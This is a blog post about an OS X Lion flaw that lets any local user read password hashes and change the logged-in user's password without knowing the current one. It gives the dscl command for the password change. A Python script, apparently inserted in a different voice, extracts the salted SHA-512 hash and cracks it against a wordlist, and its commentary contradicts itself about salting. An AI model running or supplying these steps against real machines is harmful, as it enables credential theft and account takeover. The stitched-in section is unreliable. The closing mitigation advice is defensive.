Serious Flaw In OS X Allows ANY Local User To Change Your Password…. Fanbois Freak

I used to think that Apple OS X was an extremely secure operating system. However, this news has me thinking twice. If you’re running OS X Lion, a security researcher has found that any local user can read every other user’s password hashes, and that the logged-in user’s password can be changed without knowing the current one:

In previous versions of OS X (10.6, 10.5, 10.4) the process to extract user password hashes has been the same: obtain the user’s GeneratedUID and then use that ID to extract hashes from a specific user’s shadow file (See my previous post for a more detailed description).

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion’s implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion’s authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

Ouch. This is one hell of a screw-up. But it’s actually worse than that. Most operating systems require you to type in the existing password before you can change it. Not OS X Lion:

Now, if the password is not found by the dictionary file you’re out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And voilà! You will be prompted to enter a new password without the need to authenticate.
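To make the hash-extraction and dictionary-cracking side of this concrete, here is an added example in Python. It is my own illustration, not code from this post or from the researcher quoted above. It assumes the Lion ShadowHashData layout the referenced research describes: a binary plist whose SALTED-SHA512 entry is a 4-byte salt followed by SHA-512(salt || password), which dscl prints as a hex string (the dscl read command in the comment is likewise assumed, not taken from this page). The sample blob, salt, password and wordlist are constructed inline so the script runs anywhere, Mac or not.

```python
import binascii
import hashlib
import plistlib

# Assumed layout of Lion's SALTED-SHA512 entry: 4-byte salt followed by
# SHA-512(salt || password), 68 bytes in total.
SALT_LEN = 4
DIGEST_LEN = hashlib.sha512().digest_size  # 64


def build_shadow_hash_data(password: str, salt: bytes) -> bytes:
    """Constructed sample only: build a ShadowHashData blob laid out the way
    Lion is assumed to store it, so the parser below has realistic input."""
    if len(salt) != SALT_LEN:
        raise ValueError("Lion uses a 4-byte salt")
    digest = hashlib.sha512(salt + password.encode("utf-8")).digest()
    return plistlib.dumps({"SALTED-SHA512": salt + digest}, fmt=plistlib.FMT_BINARY)


def parse_shadow_hash_data(hex_blob: str):
    """Turn the hex string dscl prints for ShadowHashData back into (salt, digest).

    The hex is assumed to be the raw bytes of a binary plist; whitespace and
    line breaks from a copy-pasted terminal dump are ignored.
    """
    raw = binascii.unhexlify("".join(hex_blob.split()))
    entry = plistlib.loads(raw)["SALTED-SHA512"]
    if len(entry) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(entry))
    return entry[:SALT_LEN], entry[SALT_LEN:]


def crack_salted_sha512(salt: bytes, digest: bytes, wordlist):
    """Dictionary attack: return the first word whose salted SHA-512 matches
    the stored digest, or None if the wordlist is exhausted."""
    for word in wordlist:
        if hashlib.sha512(salt + word.encode("utf-8")).digest() == digest:
            return word
    return None


# Constructed demo input: the kind of hex dump a non-root user would get from
# `dscl localhost -read /Search/Users/bob dsAttrTypeNative:ShadowHashData`
# (assumed command and output format), built here from a known password/salt.
SAMPLE_HEX = binascii.hexlify(
    build_shadow_hash_data("hunter2", b"\x01\x02\x03\x04")
).decode()
SAMPLE_WORDLIST = ["password", "letmein", "hunter2", "qwerty"]


def demo():
    """Parse the constructed blob and run the wordlist against it."""
    salt, digest = parse_shadow_hash_data(SAMPLE_HEX)
    return crack_salted_sha512(salt, digest, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print(demo())
```

The point worth noticing is how cheap this is: a single unsalted-per-iteration SHA-512 per candidate, with only a 4-byte salt, so a modest wordlist finishes in well under a second on any laptop, which is exactly why readable hashes are a problem even before the password-change bug enters the picture.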

Apple has really dropped the ball here. But there is some good news. An attacker needs to already be running as a local user on the machine, whether sitting in front of it or through an existing login such as an SSH session; this is a local privilege problem, not something exploitable over the network by itself. Also, there are no known exploits in the wild (yet). Still, this is a #fail for Apple.

How do you protect yourself if you’re an OS X Lion user? CNET recommends disabling automatic login, requiring a password to wake from sleep or the screensaver, and disabling the guest account, all of which limit who can get a local session in the first place. Or you could always go back to Leopard or Snow Leopard.

Apple, you have some explaining to do.
